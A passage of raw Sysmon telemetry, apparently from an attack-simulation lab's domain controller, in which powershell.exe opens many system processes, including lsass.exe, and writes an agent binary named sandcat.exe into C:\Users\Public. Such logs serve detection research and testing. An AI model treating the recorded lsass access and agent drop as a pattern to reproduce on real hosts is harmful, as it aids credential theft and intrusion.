13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-2100-00000000A301}2444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1F00-00000000A301}2300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1C00-00000000A301}2164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1A00-00000000A301}2148C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.689{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 11241100x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:34:02.455{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-01-18 13:32:43.210 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 